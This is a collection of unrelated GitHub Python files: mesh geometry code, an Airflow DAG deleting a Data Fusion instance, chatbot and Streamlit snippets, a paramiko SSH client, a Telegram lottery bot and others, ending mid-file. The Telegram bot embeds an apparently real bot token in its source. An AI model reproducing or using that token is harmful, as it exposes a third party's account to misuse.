\n# \n# \\[ \\mu = \\frac{E-G +2iF}{E+G +2\\sqrt{EG-F^2}} \\]\n# \n# where \\( ds^2=Edx^2+2Fdxdy+Gdy^2 \\) is metric.\n#\n## Syntax\n# mu = compute_bc(face,uv,vertex)\n#\nfrom algebra.face_area import *\nimport numpy as np\nfrom dbgtool.dbgtool import *\ndef compute_bc(face, uv, vertex):\n nf = face.shape[0]\n fa = face_area(face, uv)\n Duv = np.concatenate((uv[face[:, 2], :] - uv[face[:, 1], :], uv[face[:, 0], :] - uv[face[:, 2], :],\n uv[face[:, 1], :] - uv[face[:, 0], :]))\n fafafa = np.concatenate((fa, fa, fa))\n Duv[:, 
0] = Duv[:, 0] / fafafa / 2.0\n Duv[:, 1] = Duv[:, 1] / fafafa / 2.0\n\n\n if vertex.shape[1] == 2:\n nv = vertex.shape[0]\n z = np.zeros(nv, np.complex)\n z.real = vertex[:, 0]\n z.imag = vertex[:, 1]\n flatface = np.concatenate((face[:, 0], face[:, 1], face[:, 2]))\n Dcz = np.sum(reshape((Duv[:, 1] - 1j * Duv[:, 0]) * z[flatface], (nf, 3), order='F'), axis=1)\n Dzz = np.sum(reshape((Duv[:, 1] + 1j * Duv[:, 0]) * z[flatface], (nf, 3), order='F'), axis=1)\n mu = Dcz / Dzz\n\n if vertex.shape[1] == 3:\n du = np.zeros((nf, 3))\n flatface = np.concatenate((face[:, 0], face[:, 1], face[:, 2]))\n du[:, 0] = np.sum(reshape(Duv[:, 1] * vertex[flatface, 0], (nf, 3), order='F'), axis=1)\n du[:, 1] = np.sum(reshape(Duv[:, 1] * vertex[flatface, 1], (nf, 3), order='F'), axis=1)\n du[:, 2] = np.sum(reshape(Duv[:, 1] * vertex[flatface, 2], (nf, 3), order='F'), axis=1)\n dv = np.zeros((nf, 3))\n dv[:, 0] = np.sum(reshape(Duv[:, 0] * vertex[flatface, 0], (nf, 3), order='F'), axis=1)\n dv[:, 1] = np.sum(reshape(Duv[:, 0] * vertex[flatface, 1], (nf, 3), order='F'), axis=1)\n dv[:, 2] = np.sum(reshape(Duv[:, 0] * vertex[flatface, 2], (nf, 3), order='F'), axis=1)\n\n E = np.sum(du * du, axis=1)\n G = np.sum(dv * dv, axis=1)\n F = -np.sum(du * dv, axis=1)\n mu = (E - G + 2j * F) / (E + G + 2 * np.sqrt(E * G - np.power(F,2)))\n\n if vertex.shape[1] != 2 and vertex.shape[1] != 3:\n raise NameError('Dimension of target mesh must be 3 or 2.')\n\n mu[np.abs(mu) > 1e3] = 1e3\n mu[np.isnan(mu)] = 1\n\n return mu\n","repo_name":"Project1HY/Ramp","sub_path":"shape_completion-main/src/core/geom/todo/CanonicalCoordinateGeometryLearn/algebra/compute_bc.py","file_name":"compute_bc.py","file_ext":"py","file_size_in_byte":2491,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"75"} +{"seq_id":"28287724452","text":"# Não consegui fazer esse exercicios. Tenho que APRENDER!!!\n\nprint('Gerador de PA')\nprint('-=' * 10)\n\nprimeiro_termo = int(input('Primeiro termo: '))\nrazao = int(input('Razão: '))\n\ntermo = primeiro_termo\ncontador = 1\n\nwhile contador <= 10:\n print(f'{termo} -> ', end='')\n termo = termo + razao\n contador = contador + 1\n\nprint('FIM')\n","repo_name":"saulojustiniano1/cursoemvideo-exercicios","sub_path":"python/ex061.py","file_name":"ex061.py","file_ext":"py","file_size_in_byte":344,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"1049048147","text":"from __future__ import print_function\n\nfrom airflow import models\nfrom airflow.operators import bash_operator\nfrom airflow.utils import timezone\nfrom datetime import datetime, timedelta\nfrom airflow.providers.google.cloud.operators.datafusion import (\n CloudDataFusionCreateInstanceOperator,\n CloudDataFusionCreatePipelineOperator,\n CloudDataFusionDeleteInstanceOperator,\n CloudDataFusionDeletePipelineOperator,\n CloudDataFusionGetInstanceOperator,\n CloudDataFusionListPipelinesOperator,\n CloudDataFusionRestartInstanceOperator,\n CloudDataFusionStartPipelineOperator,\n CloudDataFusionStopPipelineOperator,\n CloudDataFusionUpdateInstanceOperator,\n)\n\n\n# -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- --\n# -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- --\n#\n# !! (DO NOT MODIFY) !!\n#\n# -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- --\n# -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- --\n# !! WARNING !! 
Modifying the DAG name invalidates the DAG composer configuration\ndagIdentifier = \"datafusionInstanceDestroy\"\n\n# -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- --\n# -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- --\n#\n# -- CALCULATED GLOBAL VARIABLES --\n#\n# !! (DO NOT MODIFY) !!\n#\n# -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- --\n# -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- --\n\n## -- -- -- -- -- -- -- -- -- -- -- --\n## ws2 dag generic configuration\n## -- -- -- -- -- -- -- -- -- -- -- --\ndagsConfiguration = models.Variable.get(\"main\", deserialize_json=True)\ndatafusionInstanceName = dagsConfiguration[\"datafusionInstanceName\"]\ndatafusionInstanceType = dagsConfiguration[\"datafusionInstanceType\"]\ndatafusionLocation = dagsConfiguration[\"datafusionLocation\"]\ndataprocServiceAccount = dagsConfiguration[\"dataprocServiceAccount\"]\ndatafusionPipelineName = dagsConfiguration[\"datafusionPipelineName\"]\n## -- -- -- -- -- -- -- -- -- -- -- --\n## dag specific configuration\n## -- -- -- -- -- -- -- -- -- -- -- --\n# -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- --\n# -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- --\n#\n# -- TEMPLATES AND CONSTANTS --\n#\n# !! (DO NOT MODIFY) !!\n#\n# -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- --\n# -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- --\n\n# -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- --\n# -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- --\n#\n# -- CUSTOMIZE --\n#\n# -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- --\n# -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- --\n\n# -- -- -- -- -- -- -- -- --\n# default dag arguments\n# -- -- -- -- -- -- -- -- --\ndefault_dag_args = {\n 'owner': 'ws2',\n 'start_date': datetime(2020, 1, 1),\n 'depends_on_past': False,\n 'email_on_failure': False,\n 'email_on_retry': False,\n 'retries': 5,\n 'retry_delay': timedelta(seconds=30)\n}\n\nwith models.DAG(\n dagIdentifier,\n schedule_interval='0 20 * * *',\n #schedule_interval=None,\n catchup=False,\n default_args=default_dag_args) as dag:\n # -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- --\n # -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- --\n #\n # -- OPERATIONS --\n #\n # -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- --\n # -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- --\n\n delete_pipeline = CloudDataFusionDeletePipelineOperator(\n location=datafusionLocation,\n pipeline_name=datafusionPipelineName,\n instance_name=datafusionInstanceName,\n task_id=\"delete_pipeline_edm\",\n )\n\n\n delete_instance = CloudDataFusionDeleteInstanceOperator(\n location=datafusionLocation,\n instance_name=datafusionInstanceName,\n task_id=\"delete_instance\"\n )\n\n\n\n # -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- --\n # -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- --\n #\n # -- OPERATION DEPENDENCIES --\n #\n # -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- --\n # -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- --\n delete_pipeline >> 
delete_instance","repo_name":"sscosta/datafusion-on-demand","sub_path":"datafusionInstanceDestroy.py","file_name":"datafusionInstanceDestroy.py","file_ext":"py","file_size_in_byte":4823,"program_lang":"python","lang":"sr","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"1406506180","text":"from chatterbot import ChatBot\nfrom chatterbot.trainers import ChatterBotCorpusTrainer\n\n# Create a new chat bot named Omar\nchatbot = ChatBot('Omar',\n                  storage_adapter='chatterbot.storage.SQLStorageAdapter',\n                  logic_adapters=[\n                      {\n                          'import_path': 'chatterbot.logic.BestMatch'\n                      },\n                      {\n                          'import_path': 'chatterbot.logic.LowConfidenceAdapter',\n                          'threshold': 0.65,\n                          'default_response': 'I am sorry, but I do not understand.'\n                      }\n                  ],\n                  filters=[\"chatterbot.filters.RepetitiveResponseFilter\"],\n                  input_adapter='chatterbot.input.TerminalAdapter',\n                  output_adapter='chatterbot.output.TerminalAdapter'\n                  )\n\n# Create a new trainer for the chatbot\ntrainer = ChatterBotCorpusTrainer(chatbot)\n\n# Now let us train our bot with multiple corpus\ntrainer.train(\"chatterbot.corpus.arabic.greetings\",\n              \"chatterbot.corpus.arabic.conversations\")\n\n","repo_name":"AymanRabaya20/Chat_Bot","sub_path":"demo_moudle.py","file_name":"demo_moudle.py","file_ext":"py","file_size_in_byte":1134,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"21936534997","text":"import cv2\nimport sys\n\nframes_list = sys.argv[1]\noriginal_video_path = sys.argv[2]\noutput_video_path = sys.argv[3]\n\nwidth = int(sys.argv[4])\nheight = int(sys.argv[5])\n\nwith open(frames_list, 'r') as f:\n    frames = f.readlines()\n\nog_vid = cv2.VideoCapture(original_video_path)\nselected_vid = cv2.VideoWriter()\nfourcc = cv2.VideoWriter_fourcc(*'mp4v')\nselected_vid.open(output_video_path, fourcc, 30, (width, height))\n\nif not selected_vid.isOpened():\n    print(\"Error opening output video\")\n    sys.exit(1)\n\n# Seek to each selected frame in the source video and copy it to the output.\nfor frame_num in frames:\n    og_vid.set(cv2.CAP_PROP_POS_FRAMES, int(frame_num))\n    ret, frame = og_vid.read()\n    if ret:\n        selected_vid.write(frame)\n\nselected_vid.release()\n","repo_name":"uwdb/vss","sub_path":"cc/alpr/saveSubsetOfFrames.py","file_name":"saveSubsetOfFrames.py","file_ext":"py","file_size_in_byte":676,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"75"} +{"seq_id":"39771329068","text":"import sqlite3\n\nconn = sqlite3.connect('rest_server.db')\n\n\nclass Participant:\n    def __init__(self):\n        try:\n            conn.execute('''CREATE TABLE WORKSHOP\n                (ID INT PRIMARY KEY NOT NULL,\n                NAME TEXT NOT NULL,\n                AGE INT NOT NULL,\n                CITY CHAR(50));''')\n        except Exception as e:\n            print('Table creation error')\n\n    def create_participant(self, name, age, city):\n        last_id = conn.execute(\"SELECT MAX(id) from WORKSHOP\").fetchone()[0]\n        last_id = 0 if last_id is None else last_id\n        # Parameterized query avoids SQL injection through the inputs.\n        conn.execute(\"INSERT INTO WORKSHOP (ID,NAME,AGE,CITY) \"\n                     \"VALUES (?, ?, ?, ?)\", (last_id + 1, name, age, city))\n\n        conn.commit()\n\n    def list_participants(self):\n\n        participants = []\n        cursor = conn.execute(\"SELECT id, name, city from WORKSHOP\")\n        for row in cursor:\n            participants.append({\"id\": row[0],\n                                 \"name\": row[1],\n                                 \"city\": row[2]})\n        return participants\n","repo_name":"koshikraj/PythonLectures","sub_path":"scripts/webapp/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1155,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"74192486642","text":"from re 
import U\r\nfrom app.db import db\r\nfrom mysql.connector import IntegrityError\r\n\r\nclass AccountModel:\r\n def get_accounts_by_box_owner_and_box_name(self, box_owner,box_name):\r\n cursor = db.cursor(dictionary=True)\r\n cursor.execute(f\"SELECT * FROM accounts WHERE box_owner = %s AND box_name = %s\",[box_owner,box_name])\r\n accounts = cursor.fetchall()\r\n cursor.close()\r\n return accounts\r\n\r\n \r\n\r\n def get_account(self,box_owner,box_name,account_id):\r\n cursor = db.cursor(dictionary=True)\r\n cursor.execute(f\"SELECT * FROM accounts WHERE box_owner = %s AND box_name = %s AND account_id = %s\",\r\n [box_owner,box_name,account_id])\r\n account = cursor.fetchall()\r\n cursor.close()\r\n return account[0] if len(account) > 0 else None\r\n\r\n\r\n def create_account(self,box_owner,box_name,account_data):\r\n try:\r\n \r\n cursor = db.cursor(dictionary=True)\r\n\r\n cursor.execute(\"\"\"\r\n SELECT MAX(account_id) INTO @last_id \r\n FROM accounts \r\n WHERE accounts.box_owner = %s AND accounts.box_name = %s\r\n \"\"\",[box_owner,box_name])\r\n \r\n\r\n cursor.execute(\"\"\"\r\n INSERT INTO accounts (box_owner,box_name,account_id,account_description,account_user,account_password)\r\n VALUES (%s,%s,@last_id + 1,%s,%s,%s)\r\n \"\"\",[box_owner,box_name,account_data[\"description\"],account_data[\"user\"], account_data[\"password\"]])\r\n\r\n db.commit()\r\n cursor.close()\r\n return {\"created_id\": cursor.lastrowid}\r\n except IntegrityError:\r\n return \"duplicated\"\r\n \r\n\r\n\r\n def delete_account(self,box_owner,box_name,account_id):\r\n cursor = db.cursor(dictionary=True)\r\n cursor.execute(f\"DELETE FROM accounts WHERE box_owner = %s AND box_name = %s AND account_id = %s\", \r\n [box_owner,box_name,account_id])\r\n db.commit()\r\n cursor.close()\r\n return {\"deleted_id\": cursor.lastrowid} ","repo_name":"AlanHoltz/passguard-rest-api","sub_path":"app/models/account.py","file_name":"account.py","file_ext":"py","file_size_in_byte":2042,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"37005301670","text":"#!/usr/bin/env python3\nfrom os import system\nfrom paramiko import SSHClient, AutoAddPolicy, RSAKey\nfrom paramiko.auth_handler import AuthenticationException, SSHException\nfrom scp import SCPClient, SCPException\nfrom log import logger\n\n\nclass RemoteClient:\n \"\"\"Client to interact with a remote host via SSH & SCP.\n\n Code from https://github.com/hackersandslackers/paramiko-tutorial\n\n \"\"\"\n def __init__(self, host, user, ssh_key_filepath, remote_path):\n self.host = host\n self.user = user\n self.ssh_key_filepath = ssh_key_filepath\n self.remote_path = remote_path\n self.client = None\n self.scp = None\n self.conn = None\n # self._upload_ssh_key(self)\n\n @logger.catch\n def __get_ssh_key(self):\n \"\"\"Fetch locally stored SSH key.\"\"\"\n try:\n self.ssh_key = RSAKey.from_private_key_file(self.ssh_key_filepath)\n logger.info(f'Found SSH key at self {self.ssh_key_filepath}')\n except SSHException as error:\n logger.error(error)\n return self.ssh_key\n\n @logger.catch\n def __upload_ssh_key(self):\n try:\n system(f'ssh-copy-id -i {self.ssh_key_filepath} {self.user}@{self.host}>/dev/null 2>&1')\n system(f'ssh-copy-id -i {self.ssh_key_filepath}.pub {self.user}@{self.host}>/dev/null 2>&1')\n logger.info(f'{self.ssh_key_filepath} uploaded to {self.host}')\n except FileNotFoundError as error:\n logger.error(error)\n\n def __connect(self):\n \"\"\"Open a connection to the remote host.\"\"\"\n if self.conn 
is None:\n try:\n self.client = SSHClient()\n self.client.load_system_host_keys()\n self.client.set_missing_host_key_policy(AutoAddPolicy())\n self.client.connect(\n self.host,\n username=self.user,\n key_filename=self.ssh_key_filepath,\n look_for_keys=True,\n timeout=5000\n )\n self.scp = SCPClient(self.client.get_transport())\n except AuthenticationException as error:\n logger.error(f'Authentication failed: did you remember to create a key? {error}')\n raise error\n return self.client\n\n def disconnect(self):\n \"\"\"Close the connections\"\"\"\n if self.client:\n self.client.close()\n if self.scp:\n self.scp.close()\n\n @logger.catch\n def bulk_upload(self, file_list):\n \"\"\"Upload mutiple files to a remote directory\n\n :param file_list: List of local files to be uploaded.\n :type file_list: List[str]\n \"\"\"\n self.conn = self.__connect()\n uploads = [self.__upload_single_file(fn) for fn in file_list]\n logger.info(f'Finished uploading {len(uploads)} files to {self.remote_path} on {self.host}')\n\n def __upload_single_file(self, fn):\n \"\"\"Upload a single file to a remote directory\"\"\"\n upload = None\n try:\n self.scp.put(\n fn,\n recursive=True,\n remote_path=self.remote_path\n )\n upload = fn\n except SCPException as error:\n logger.error(error)\n raise error\n finally:\n logger.info(f'Uploaded {fn} to {self.remote_path}')\n return upload\n\n def download_file(self, file):\n \"\"\"Download file from remote host.\"\"\"\n self.conn = self.__connect()\n self.scp.get(file)\n\n @logger.catch\n def execute_commands(self, commands):\n \"\"\"Execute multiple commands in succession.\n\n :param commands: List of unix commands as strings.\n :type commands: List[str]\n \"\"\"\n self.conn = self.__connect()\n for cmd in commands:\n stdin, stdout, stderr = self.client.exec_command(cmd)\n stdout.channel.recv_exit_status()\n response = stdout.readlines()\n for line in response:\n logger.info(f'INPUT: {cmd} | OUTPUT: {line}')\n\n @logger.catch\n def execute_single_command(self, command):\n \"\"\"Execute a command and return the result from STDOUT\n\n :param command: A unix command as a string\n :type command: str\n \"\"\"\n self.conn = self.__connect()\n stdin, stdout, stderr = self.client.exec_command(command)\n stdout.channel.recv_exit_status()\n errors = stderr.readlines()\n if len(errors) > 0:\n error_msg = \"\\n\".join(errors)\n logger.error(f\"Command failed: {error_msg}\")\n raise Exception(\"SSH Remote Command failed, see log\")\n response = stdout.readlines()\n return response\n","repo_name":"jfriant/backup-byssh","sub_path":"client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":4740,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"27952733519","text":"import streamlit as st\nimport style\n\ndef contact_main():\n st.markdown(\"\"\" \"\"\", unsafe_allow_html=True)\n st.markdown('
<h1 style="text-align: center;">Contact Form</h1>
', unsafe_allow_html=True)\n with st.form(key='columns_in_form2',clear_on_submit=True): #set clear_on_submit=True so that the form will be reset/cleared once it's submitted\n #st.write('Please help us improve!')\n Name=st.text_input(label='Your Name:') #Collect user feedback\n Email=st.text_input(label='Your Email to Contact:') #Collect user feedback\n Message=st.text_area(label='Your Feedback or Query:') #Collect user feedback\n submitted = st.form_submit_button('Submit')\n if submitted:\n st.write('Thanks for your contacting us. We will respond to your questions or inquiries as soon as possible!')\n \n \n\n\ndef contact_main1():\n st.markdown(\"\"\" \"\"\", unsafe_allow_html=True)\n st.markdown('
<h1 style="text-align: center;">Contact Form</h1>
', unsafe_allow_html=True)\n \n contact_form = \"\"\"\n
<form action="https://formsubmit.co/YOUR@EMAIL.COM" method="POST">\n        <input type="hidden" name="_captcha" value="false">\n        <input type="text" name="name" placeholder="Your name" required>\n        <input type="email" name="email" placeholder="Your email" required>\n        <textarea name="message" placeholder="Your message here"></textarea>\n        <button type="submit">Send</button>\n    </form>
\n    """\n    \n    st.markdown(contact_form, unsafe_allow_html=True)\n    \n    # Use Local CSS File\n    def local_css(file_name):\n        with open(file_name) as f:\n            st.markdown(f"<style>{f.read()}</style>", unsafe_allow_html=True)\n\n\n    local_css("style/style.css")","repo_name":"singhsud2157/project_capstone","sub_path":"helper/contact.py","file_name":"contact.py","file_ext":"py","file_size_in_byte":1882,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"40611026022","text":"import logging\nimport traceback\nimport html\nimport json\nimport random\n\nfrom telegram import Update\nfrom telegram.ext import Updater, CommandHandler, CallbackContext\nimport requests\nimport re\n\nlogging.basicConfig(\n    format='%(asctime)s - %(name)s - %(levelname)s - %(message)s',\n    level=logging.INFO)\n\nlogger = logging.getLogger(__name__)\n\ndef start(update: Update, context: CallbackContext) -> None:\n    update.message.reply_text('Are you ready for some luck?\\n \\nUse /toto or /4d to generate your lottery numbers!\\n\\nClick /news for latest lottery updates or /sgpools to redirect to SGPools website!')\n\ndef help(update: Update, context: CallbackContext) -> None:\n    update.message.reply_text('Use /toto or /4d to generate your lottery numbers!\\n\\nClick /news for latest lottery updates or /sgpools to redirect to SGPools website!')\n    \ndef error_handler(update: Update, context: CallbackContext) -> None:\n    logger.error(msg="Exception while handling an update:", exc_info=context.error)\n    tb_list = traceback.format_exception(None, context.error, context.error.__traceback__)\n    tb_string = ''.join(tb_list)\n    message = (\n        f'An exception was raised while handling an update\\n'\n        f'<pre>
update = {html.escape(json.dumps(update.to_dict(), indent=2, ensure_ascii=False))}'\n        '</pre>\\n\\n'\n        f'<pre>context.chat_data = {html.escape(str(context.chat_data))}</pre>\\n\\n'\n        f'<pre>context.user_data = {html.escape(str(context.user_data))}</pre>\\n\\n'\n        f'<pre>{html.escape(tb_string)}</pre>
'\n )\n \n \ndef toto(update: Update, context: CallbackContext) -> None:\n number = random.sample(range(1, 50), 6)\n no = str(number[0])\n for i in range(1, len(number)):\n no += ' ' + str(number[i])\n chat_id = update.message.chat_id\n update.message.reply_text(\"Here are your 6 lucky TOTO numbers!\\n \\n\" + no)\n return\n\ndef fourd(update: Update, context: CallbackContext) -> None:\n number = random.sample(range(0, 10), 4)\n no = ''\n for i in number:\n no += str(i)\n chat_id = update.message.chat_id\n update.message.reply_text(\"Huat ah!\\n \\n\" + no)\n return\n\ndef news(update: Update, context: CallbackContext) -> None:\n update.message.reply_text(\"Link to CNA Singapore Pools News:\\n\\nhttps://www.channelnewsasia.com/news/topic/singapore-pools\")\n return \n\ndef sgpools(update: Update, context: CallbackContext) -> None:\n update.message.reply_text(\"Link to Singapore Pools portal:\\n\\nhttps://www.singaporepools.com.sg/landing/en/Pages/index.html\")\n return \n \ndef main():\n updater = Updater('1593199777:AAHWnaJy7vCdHioKag86V3SPMzDMzt5kE8w', use_context=True)\n dp = updater.dispatcher\n dp.add_handler(CommandHandler(\"start\", start))\n dp.add_handler(CommandHandler(\"help\", start))\n dp.add_handler(CommandHandler(\"toto\", toto))\n dp.add_handler(CommandHandler(\"4d\", fourd))\n dp.add_handler(CommandHandler(\"news\", news))\n dp.add_handler(CommandHandler(\"sgpools\", sgpools))\n dp.add_error_handler(error_handler)\n updater.start_polling()\n updater.idle()\n \n\nif __name__ == '__main__':\n main()\n","repo_name":"yxchoong/telegram-lottery-bot","sub_path":"lottery.py","file_name":"lottery.py","file_ext":"py","file_size_in_byte":3133,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"30619023786","text":"import logging\n\nfrom ming.odm import Mapper\nfrom pylons import app_globals as g\n\nfrom vulcanforge.virusscan.model import S3VirusScannableMixin\nfrom . 
import base\n\nLOG = logging.getLogger(__name__)\n\n\nclass ScanFiles(base.Command):\n min_args = 1\n max_args = 1\n usage = ''\n summary = 'Scan unscanned files'\n parser = base.Command.standard_parser(verbose=True)\n\n def command(self):\n self.basic_setup()\n\n for m in Mapper.all_mappers():\n if issubclass(m.mapped_class, S3VirusScannableMixin):\n instances = m.mapped_class.query.find({\n '$and': [\n {'$or': [\n {'virus_scan_status': {'$exists': False}},\n {'virus_scan_status': 'unscanned'}\n ]},\n {'$or': [\n {'deleted': {'$exists': False}},\n {'deleted': False}\n ]}\n ]\n })\n for instance in instances:\n instance.scan_for_virus.post(\n taskd_priority=g.clamav_task_priority)","repo_name":"vulcan-collaboration/vulcanforge","sub_path":"vulcanforge/command/virus_scan.py","file_name":"virus_scan.py","file_ext":"py","file_size_in_byte":1186,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"42066636283","text":"import Tkinter\nimport calendar\nimport time\nimport tkFont\nimport ttk\n\n\ndef sequence(*functions): # to run 2 or more functions on button click\n for function in functions:\n function()\n\n\ndef update(y, m, tx, curdate): # generate calendar with right colors\n calstr = calendar.month(y, m)\n tx.configure(state=Tkinter.NORMAL)\n tx.delete('0.0', Tkinter.END) # remove previous calendar\n tx.insert(Tkinter.INSERT, calstr)\n for i in range(2, 9):\n tx.tag_add(\"others\", '{}.0'.format(i), '{}.end'.format(i)) # tag days for coloring\n if len(tx.get('{}.0'.format(i), '{}.end'.format(i))) == 20:\n tx.tag_add(\"sun\", '{}.end-2c'.format(i), '{}.end'.format(i))\n tx.tag_config(\"sun\", foreground=\"#fb4622\")\n tx.tag_config(\"others\", foreground=\"#427eb5\")\n tx.tag_add(\"head\", '1.0', '1.end')\n if curdate[0] == y and curdate[1] == m:\n index = tx.search(str(curdate[2]), '2.0') # search for today's date\n tx.tag_add(\"cur\", index, '{}+2c'.format(index)) # highlight today's date\n tx.tag_config(\"cur\", background=\"blue\", foreground=\"white\")\n tx.tag_config(\"head\", font=segoe, foreground=\"#0d8241\", justify=Tkinter.CENTER)\n tx.configure(state=Tkinter.DISABLED) # make text view not editable\n\n\ntop = Tkinter.Tk()\ntop.title(\"Calendar\")\ntop.minsize(200, 200)\ntop.maxsize(250, 250)\nlogo = Tkinter.PhotoImage(file=\"Britalstar.gif\")\ntop.tk.call('wm', 'iconphoto', top._w, logo)\nsegoe = tkFont.Font(family='Segoe UI')\ncurtime = time.localtime()\nyear = Tkinter.StringVar()\nmonth = Tkinter.StringVar()\nyearInt = curtime[0]\nmonthInt = curtime[1]\ndateInt = curtime[2]\nHLayout = ttk.PanedWindow(top, orient=Tkinter.HORIZONTAL)\nctx = Tkinter.Text(top, padx=10, pady=10, bg=\"#f3e9ae\", relief=Tkinter.FLAT, height=9,\n width=20) # text view to passing to functions\n\n\ndef nextb(): # on click next button\n global monthInt, yearInt, ctx, curtime\n monthInt += 1\n if monthInt > 12:\n monthInt = monthInt % 12\n yearInt += 1\n update(yearInt, monthInt, ctx, curtime)\n\n\ndef prevb(): # on click previous button\n global monthInt, yearInt, ctx, curtime\n monthInt -= 1\n if monthInt < 1:\n monthInt = 12\n yearInt -= 1\n update(yearInt, monthInt, ctx, curtime)\n\n\ndef okcall(): # ok button click inside go to date window\n global monthInt, yearInt, ctx, curtime\n if (year.get().isdigit() and month.get().isdigit()) and (\n (0 < int(year.get()) < 10000) and (0 < int(month.get()) < 13)):\n yearInt = int(year.get())\n monthInt = int(month.get())\n update(yearInt, monthInt, ctx, curtime)\n\n\ndef gotod(): # go to date window 
creation\n newtop = Tkinter.Toplevel()\n newtop.title(\"Calendar\")\n newtop.maxsize(190, 190)\n newtop.focus_set()\n newtop.tk.call('wm', 'iconphoto', newtop._w, logo)\n HLayout = ttk.PanedWindow(newtop, orient=Tkinter.HORIZONTAL)\n HLayout2 = ttk.PanedWindow(newtop, orient=Tkinter.HORIZONTAL)\n yearText = ttk.Label(HLayout, text=\"Year :\")\n yearEdit = ttk.Entry(HLayout, textvariable=year)\n monthText = ttk.Label(HLayout2, text=\"Month:\")\n monthEdit = ttk.Entry(HLayout2, textvariable=month)\n okb = ttk.Button(newtop, text=\"Ok\", command=lambda: sequence(okcall, newtop.destroy))\n yearText.pack(side=Tkinter.LEFT)\n yearEdit.pack(side=Tkinter.RIGHT)\n monthText.pack(side=Tkinter.LEFT)\n monthEdit.pack(side=Tkinter.RIGHT)\n HLayout.pack()\n HLayout2.pack()\n okb.pack()\n newtop.mainloop()\n\n\ndef about_show(): # about window creation\n newtop = Tkinter.Toplevel()\n newtop.title(\"Calendar\")\n newtop.maxsize(190, 190)\n newtop.focus_set()\n newtop.tk.call('wm', 'iconphoto', newtop._w, logo)\n about = ttk.LabelFrame(newtop, text=\"About\")\n Tkinter.Label(about, text=\"Calendar 2.0\").pack()\n Tkinter.Label(about, image=logo, text=\"Developer: Britalstar\", compound=Tkinter.BOTTOM).pack()\n about.pack()\n newtop.mainloop()\n\n\nupdate(yearInt, monthInt, ctx, curtime) # for first run, generate calendar\nprev = ttk.Button(HLayout, text=\"<<\", command=prevb)\nnex = ttk.Button(HLayout, text=\">>\", command=nextb)\ngoto = ttk.Button(top, text=\"Goto\", command=gotod)\nmenubar = Tkinter.Menu(top, relief=Tkinter.FLAT)\nfilemenu = Tkinter.Menu(menubar, tearoff=0, relief=Tkinter.FLAT)\nhelpmenu = Tkinter.Menu(menubar, tearoff=0, relief=Tkinter.FLAT)\nfilemenu.add_command(label=\"Goto\", command=gotod)\nfilemenu.add_separator()\nfilemenu.add_command(label=\"Exit\", command=top.destroy)\nhelpmenu.add_command(label=\"About\", command=about_show)\nmenubar.add_cascade(label=\"File\", menu=filemenu)\nmenubar.add_cascade(label=\"Help\", menu=helpmenu)\ntop.config(menu=menubar)\nprev.pack(side=Tkinter.LEFT)\nnex.pack(side=Tkinter.RIGHT)\nctx.pack()\nHLayout.pack()\ngoto.pack()\ntop.mainloop()\n","repo_name":"RaghavaDhanya/Calendar","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4789,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"75"} +{"seq_id":"72088711921","text":"import unittest\r\nimport binary_tree\r\nimport io\r\nimport sys\r\n\r\nclass Test(unittest.TestCase):\r\n tree = binary_tree.BinaryTree(70)\r\n list = 